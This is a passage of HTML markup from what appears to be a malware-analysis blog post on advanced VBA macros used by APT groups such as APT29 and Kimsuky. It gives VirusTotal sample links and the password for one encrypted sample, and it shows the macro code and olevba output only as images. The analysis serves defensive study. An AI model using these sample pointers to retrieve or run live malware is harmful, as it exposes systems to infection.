    style=&quot;padding-bottom: 208.07291666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAqCAIAAAA8m+yHAAAACXBIWXMAAAsTAAALEwEAmpwYAAADqklEQVR42pWW2WLiMAxF8/+/x1La7Pu+ldDwOEcyhEDTzoxKg+1YlnR1JWO1bZvneVmWRVFkWV4UzPLz+fx1l8vlsh4vwtRCIYriNE19P0A4pWvbYRjGYez7fhw/kUFERuuDVDnP0cnSLI7jKE7qqk74jmPf84+HY5KmuMLYcb3A98uyqsqqrmsc5CyryAvXcTDr++zxwzAKdJwk4ovreo7tcLrtOGEYstj34kXf9dN0sbDJDuLEmuO4voptO67rE445qCiIpiSKJdq722nODpQ52HG8VAXHwwiJQZHgUbherxuA5XmBzRTcFLm27eq6QSbcum/iuUyflJM4cV2XYMIA25HneTgfhVGSCHApQEZxVdUvZu+WMwETAAkJLBo123Xd2vimiDL7CC9QYAEGy5U5qAfPiR084cy28jiOOGZ/AK9H8DwBitx4fqC55S/A+e/6N2WiNSQDtjAIyDz6wCbWuw4yzPO8bZl3tm3DB7ICZApPVRZktWPHPG9DfVNmqzDLDyoV6FlokcCKzVCflKErKUqTtBSFirQDYdu11MF3YmzEDMJkuOt7eEZ6MZ9J+Bn2Qf43ZWgeiySkmgIU1vOlpYjbpgx/syyVBMhFCTef6vVnn2/KTdM6jgM9JVtZTvCsCLwo/vpRhrUdicFZZRIf8fZfBOOWNBxT4CPFNyrBB/NuO726brCQTkK9gxg8k37i+eBMV+SURp+tCHWqFdM0cIHzHwwz/a1tWhhSa0kZHRRIuNGCAvJWuhcdssM17EtVySbtmLOKwXl+kevje+nHlrjXNCbUSUCbTKhmaCxMq4ERE7+FzUo6Ko6VS1TSX3XMiW3b3P2/Bc5ukJLWC5kR4zzBCrFVDZBwhx2yomPlvAjvOB9XLNMuTDxr9pjB9EPCbm5jMFehGDhVFEx451ucT7FO04KFKI9CDGXIMODk06ZFbuPpBTNpBvQfsgc38IKpeJHJvUleOZElgyU9QhZlQ4GKAMYEwBmNWobjXT5VTFVSogzXG0xvtdY3w9flqQwfHur/BmBlIW6rJ1miwsFrzW05a8yLw4v8R0may9VgAPWBAORSaWAlUwBjhTGsETLpXcvvAW44AQz2DMPDz9eE/OS1sWxS9sL45azLvSc88Wy6TS183u127+/vp7e3jw/7dHzb7w+Hw9E8TycWTvvd/nB8Yyqf/YFXrACwFIa5blzHlfux680Ve28JnbluzQqMkJJRAWfqeVhI8vJL6a9irbvFf2nO8/wHwEoqbUQHCiEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/cfb39a4f47c0186c86648b2074801556/7131f/AdvancedVBAmacros1.png&quot;
        srcset=&quot;/website/static/cfb39a4f47c0186c86648b2074801556/804b2/AdvancedVBAmacros1.png 384w,
/website/static/cfb39a4f47c0186c86648b2074801556/7131f/AdvancedVBAmacros1.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;olevba result:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 716px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ec21e9cca1726c19a363c9f04970506f/6bbf7/AdvancedVBAmacros2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 175.78125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAjCAIAAAAblL1PAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC/UlEQVR42oWV24KjIBBE/f+/3GgUBEGNmjzuqYY4mdlkthMRkepr0TZzzl3XhRBDCNfrdRgG7/1xHDln78fRe9b7ax9i5LHve8ZhcPxv29bMM/C87fu6rrfbrYyAl2VhH2+3bbv9K6v2NOzeJDsrW5ntewE77xl3k/PVfpQF7WlSSuaMxLnh2nUp5fv9nlPC4ZEf4zgO/cC4v4jAOM1qjNPoRzc4JtOUBM452MOUJDFGfPwJzjk558A75y1bitMsSymWo6nAPiEcTznBGTDeOa/N7CO0km2gUTJxAWaFPK0mJalyG2sxRJlB/boW3XmeeQTJZYFHbOgxBHzEAN41JAZvQXrnMXvGY5blyBSnEjNTkuLMQ24Yb3jXDwPvWAJwgmezDCCbFAKsL1JjtmxDII8XZzLgjsBR2WaP1o+fojrLbS9P4ChzthKPlTB40VMx620IxgUiD8QIb5qSOthTqHa6TWEAo5oglVHFpbRhZllmVLBBlgmP3ah4JQCLhKO3md8MYNZdF2ZYx2KzLLVuS5k9a1jA5Ph4I9KuUqHDiCSXRO5B/jweD7TAeVxm0/5OaraNDBIUGRNHnWQ7D0TI/COYIGKoR6DQkBHj1gyU6vNUvrOcsnwWTKUuZ4N3JKhtW3WV8wS/ddtqEMz2NJoQZ6lH36sr/Q4ea9ihFLOy0hpAOIv/Blyzbbb9U5irMbYdTHpXqgON1XKsyZ6s44RyEus5D2H7INWyGVPSSnnKAJJO3HVX0tZeLu1TLn8u1L+CC6WZJet4xQnuyU7YJ6kxv4C/2MId8P6r/LTsjVnms0fF/8HlMFHYmnZlb4Lb545PYj3s5Db0LHweq/fmxXvBR1xu9DVwjvOqvm+r1i40kuquSNt23bcp2edgN8nIhJ9Ptohnwb6apyK1TNS5L721k5SeSgCM/usoSk/5lOpPf60ittvYCzwJnAx88jSUG+rVqAdrEXWiqZb7wSxbdtQu5/n5VatSa/485IXFdRoC/aopLC9VuX+Xx69yv9//AkF+qON5GJr2AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ec21e9cca1726c19a363c9f04970506f/6bbf7/AdvancedVBAmacros2.png&quot;
        srcset=&quot;/website/static/ec21e9cca1726c19a363c9f04970506f/804b2/AdvancedVBAmacros2.png 384w,
/website/static/ec21e9cca1726c19a363c9f04970506f/6bbf7/AdvancedVBAmacros2.png 716w&quot;
        sizes=&quot;(max-width: 716px) 100vw, 716px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;2019-06-06 graphic.doc
&lt;a href=&quot;https://www.virustotal.com/gui/file/2832b7000869786e94dc3314f0e69d0129aa2925bca54cfd64858a2d71e12efa/detection&quot;&gt;graphic.doc&lt;/a&gt;, document dropped from the previous sample and called through Word.Application COM.&lt;/p&gt;
&lt;p&gt;VBA code:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 708px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/20e0dbf99b21b01ae1d1058d2d6a736e/3cb0f/AdvancedVBAmacros3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 107.03125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAIAAADJt1n/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB+UlEQVR42o2U63KjMAyFef+n684ksyHcFnOzsYGE+89+gi6TZrtNzxBiy5KOdaTEa9vONU3f3/u/GIbhDm43luMwYGF3HPG+3W5Y5nn2nHOpUkVRZFlWlmWW5aDYwFdVlrrSGHnYG2O2E3Ejhcc+uAZRFIVBGEVxHCdBwDZOkiSKkiiMVKow+v41xhgnOO1u1lrPWUumCmgNc5GXMMuiKMtKp39AioVjjPkHhLxxjZep7Hw6w3C5+P7FxzUMAm5F4rq2Wmsca4Hd8gtIyp7iPZyoVmrOcw5Iq5TCUpu6QcyubZxjgaigtnZLyrcTwcj3++JTxF7S6XR+e/vFrcZx5LjrOkTBG52nR8yTBJOJ6rSuilwklUKritMFrAsLsojzhk/hBKMMqmZKoXYYRiSCytbWaC2Xr23btkbv9PVzsDEIUDEMBm3TlB6oNHXWEbNPBcz74unmEkyv6b/WBvLrNUACWNAVrdZlOfyO96dgEhOJwEwUBfMwjeM+ln0//R/beFppJvywURhrZEdtKqQ30/xtMB90Pd7ruso8a0OFT/f8InjaOiEYP0wwM2dcfvoWW/A/pmIbaxmS5RWzEB/km0l+OmFM/5jKF8FS7bo8lkermEr5P7i/UrtrO6Pr/Z9htzKw+2C/rrlpWqiGfni0Tj/AF4L9HPM8vwP3dpO4Yuch6gAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/20e0dbf99b21b01ae1d1058d2d6a736e/3cb0f/AdvancedVBAmacros3.png&quot;
        srcset=&quot;/website/static/20e0dbf99b21b01ae1d1058d2d6a736e/804b2/AdvancedVBAmacros3.png 384w,
/website/static/20e0dbf99b21b01ae1d1058d2d6a736e/3cb0f/AdvancedVBAmacros3.png 708w&quot;
        sizes=&quot;(max-width: 708px) 100vw, 708px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;olevba result:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 711px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2939c70db9af7aca5a8ae89888967ada/a8e5b/AdvancedVBAmacros4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 96.09374999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAIAAAAf7rriAAAACXBIWXMAAAsTAAALEwEAmpwYAAABx0lEQVR42p2T23KDMAxE+f/vJMHY+IYN5rFHUkrTTvtSDWGMLtbuSpma2l73vbXe+/5mXU2iv9lxHFNKKYRwnqceNlLx8llr3bYtblst9fjNyJlSTCSd5xFjXFdvVxIopXjPtaHk8mcxHShogG4dR3tDCWaSDLm5220Gm4aPeQYz/Z1baS4sxsg5w8J7j9+v3tiRwKcked96E84xJpGs1lLsVw32sixEaYPH+hlMzRQuU3nBVr27IDcrJTvnSGr9RrorBXnQaJxDYC/PJXgPltWt2lZuUNhBMHsRjgcgnGD2fC40GkOLV2WCcfF1XdaZYgqMeWQkKeVcrk+znCmnjB7MkyTNyMaHN51NSBm4GoKQz/Cyzm8CzOPx3IJIbXpijIg4RCjQYYNbrgjKwhzAnKLqeY1Bk8U5VLmuYRtmc+K6+0ANVxOCNtAEtq5kt8W8t4cYRdCwDbdtsYWxt8AWkigMzlqNsM2ZydAEIbJ6UAOFGcS39TQxcOpuy36BxfoIU104Ye59ViFvIFIcXgP08zw/kA42r3k68yMEISnOsjYGp1sxOG3jv+09m6j/jdv/I/ribIv6rsTn4ev8LtV9lmJD/w8bY3wAFaYuxwaWHIsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros4png&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2939c70db9af7aca5a8ae89888967ada/a8e5b/AdvancedVBAmacros4.png&quot;
        srcset=&quot;/website/static/2939c70db9af7aca5a8ae89888967ada/804b2/AdvancedVBAmacros4.png 384w,
/website/static/2939c70db9af7aca5a8ae89888967ada/a8e5b/AdvancedVBAmacros4.png 711w&quot;
        sizes=&quot;(max-width: 711px) 100vw, 711px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;2016-11-09 &lt;a href=&quot;https://www.virustotal.com/gui/file/ef4a4319b9c37c1f05a4cbfb136c0eaf4a05476028d40a2a6bb07afc567f0f88/detection&quot;&gt;election-headlines-FTE2016.docm&lt;/a&gt; from &lt;a href=&quot;https://attack.mitre.org/groups/G0016/&quot;&gt;APT29&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The sample is a &lt;a href=&quot;https://en.wikipedia.org/wiki/Compound_File_Binary_Format&quot;&gt;CDFV2&lt;/a&gt; Encrypted with password 3209. password
&lt;a href=&quot;https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/&quot;&gt;password source&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;APT29 is one of the groups with advanced &lt;a href=&quot;https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures&quot;&gt;TTPs&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;VBA code:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 702px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/89b60dfbdefdb35021124664c471b31f/d6331/AdvancedVBAmacros5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 540.1041666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,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&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/89b60dfbdefdb35021124664c471b31f/d6331/AdvancedVBAmacros5.png&quot;
        srcset=&quot;/website/static/89b60dfbdefdb35021124664c471b31f/804b2/AdvancedVBAmacros5.png 384w,
/website/static/89b60dfbdefdb35021124664c471b31f/d6331/AdvancedVBAmacros5.png 702w&quot;
        sizes=&quot;(max-width: 702px) 100vw, 702px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;olevba result:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/66e0872b12b855a322a8d592a6178b69/4d08a/AdvancedVBAmacros6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 184.375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAlCAIAAADNzV5SAAAACXBIWXMAAAsTAAALEwEAmpwYAAADgklEQVR42nWV22KkQAhE/f/vHG99894mb3sK1JnsbngwPUagCii62bYdWzE7bbfxYjfbfrHjOJqpTDlnTtM0l1I2D7bvy7Lwc5omDvv/rNbapJRCjJxSjH3fk/CoRz3rPE/DMA7jSIjjX+MbnD2wJ6z1dMDOQt/Uehz6/5vCftE89qMh8DAMhABhCGGeZ/dZ5jmb8b5kMchJ52meU8oEuWB3bcczxkiU6XbmM2BjKSb9GWPfdXxDuL7ryXGeZ8MPfGIIyr+uZ61ejFlA4lRKyjnIIgkFgMwxcoBjAwBi4AM7Hb5O43nAqm2Visx4kiq4jaHretDj45nHeBtnh0QLwUoj8DQX2dPkq1U5FxETaeCIHs6CLXhJFSsy/u/j8G5WvTMnSxusZuTbj8NwwjOJpzFXRYyfkzTnlHsKZoDJUm+j2rjKLWXhDwptsUSHlKr2ZEZXefpgPH32cFQOFAyCDY7Gx8/KzHvYHxoaynBs6+YDsCzz6/UiQ7XmPebR37Pdti1IaABP8U9J1Z5spEqB+DDAbKTiVrYy6pt8zbbN+XFP8nUA2OvVkvnrPO1FtVLdM+EFI3bW6EiYUHic4emFIfqsivCYvXEClTPIG8oIYPUpBN5/Ovsk8y0OphFNRLSa+8A0wWTMPMCLzI7cZtsyw5GGTfP39/d5W73BS5KUgi/GD93fmZNLMitCkoaPd1G82pnMgObJd8//OGs0Rk2ZjxCk1OR58VZrhwFMktT8x6eNlyRdDcZ8VKfCaLMmSdvC+pRk/dGqZfXCSCFSTbIQI1mouJeg4XXXdYTlH9vHeFJj9h/m8uhNMNLmqMxUV5kn6wQgacknbFhZU6IpsnjmZOYubEPB/jIM3oCPCVt+wI7oKfuQ0vALNjDaV8sr1hq4Nkt+SVKlujYBpQZ51rTojTZRmRofLNPd8kOSBht/CdCk6EpEfPxc7DKSMDZ2+n05PfvJWzX02rLP+2eBeXWuvR0kxkFV7XvCwUdriNThWozX6gzRFx5kQUDmVVHsSvlcboRwAdMVnHSwJcuTcsAZ5vQZVgzt8TT5WUOE54v75tqcsyXbl3W5OW/ivK1vMtyBVrDoIvXZu/VW38LQrjY23kzmCH844+yL6Wn+35es7zDXt1/UfrkVu9PZbVT7UzB/O2ssi1+dc5F0mYNivV3jtajL/lvm6wY43/vt0djz8zfYfwBfiCG/inxo3wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/66e0872b12b855a322a8d592a6178b69/4d08a/AdvancedVBAmacros6.png&quot;
        srcset=&quot;/website/static/66e0872b12b855a322a8d592a6178b69/804b2/AdvancedVBAmacros6.png 384w,
/website/static/66e0872b12b855a322a8d592a6178b69/4d08a/AdvancedVBAmacros6.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;2020-03-03 &lt;a href=&quot;https://www.virustotal.com/gui/file/27d04bdb74736f9041ba89306747399e0a149439acf1048e82e4acdfa24677de/detection&quot;&gt;비건미국무부부장관서신20200302.doc&lt;/a&gt; from &lt;a href=&quot;https://attack.mitre.org/groups/G0094/&quot;&gt;Kimsuky APT&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;One of the more recent APT macro.&lt;/p&gt;
&lt;p&gt;VBA code:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4ffa0be8c9261ad36303d583be72b86a/4d08a/AdvancedVBAmacros7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 144.01041666666669%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAIAAAAl5NuSAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC2UlEQVR42o2U23qjMAyEef8XXGg42gYMhpwgQHq1v+yENl93204bEGDJI2nkqO97pXTTtk3TaC1G37tpmuZ5njzEuF6nJ25PLMsSOefqGhdrjNFKY4NxHJ1Ha+0wDLxp29b4ZfPDd16WWzT7GODx7v+YXh9ZHHW208Y0bePc4Kn+y2366jsL7Su4XKfrFII99/i0nNvt8WnPHCfZmXzyvKBmWZZVlaJmJMzni8f5fCb0OB4BdthwR3Q8nSjM4Iau66y1Xc+9O45Heeec7SyxqBd78J5wLzlPn7IMDVi3bd1WgL1tYsnFG6GuXB/OTd3AtiyKNM2k1abuuh4GXI/jKFQ82J+rGwYMKLGl0OYzvVUEUJquKm0IgRsgSRaz/ETm1yuPeyGE4LpKwYqijOMYd3RCjCxNq7JK0/Tt7UAtq6qiik6K0rvenU5nimd9/hH8+EyxiCuUhoFqEfvkwToWeR6wOcpXaHh/mEdGUKtKIT187h6bB3dvr96+rwGecEBk2zbL8vRwYH9saPtwkrmpa9RuqYS1dAsKoid+lwvkKXhEtYw2DJVWim4GnSgfQlW6LCvmhWxlGZNRNwRqmxamJBUxLgwSr6QhqMJ2JAbP5RO9fXI+xLXytzAYNs9LHBBvoCS6nUXKt28hfYZJUVRc0Sk6CtXaxfQb55KpSA8pqRZ5wb+WxA3hvgkhzhDO85zaUgPDMdQ0Mideg6TwgzM5p1m+D+rO+Ufm4ky1od35IgOU60+jL/WSN/Pu9pjn2hhEQreSJEHMBKLtJE/SpVe1Bz2u5VfXUhcZwZzkIgQRxwkKO6RULcM//hP7h5xoGEmcJPEb0XhK4pg4/sCtkbsojPIqmUhNSJGUSEyHqQiQY2gMYzpC/kPbrCQ8hwEh2A6V+ROnX56pSeXWYIiwXvvctrnfOcwD8mL11wN8f/PizIEHSRobtLkfabefIM7bfXt/f99neP01tm37Cw5vUOUjdm0gAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros7&quot;
        title=&quot;&quot;
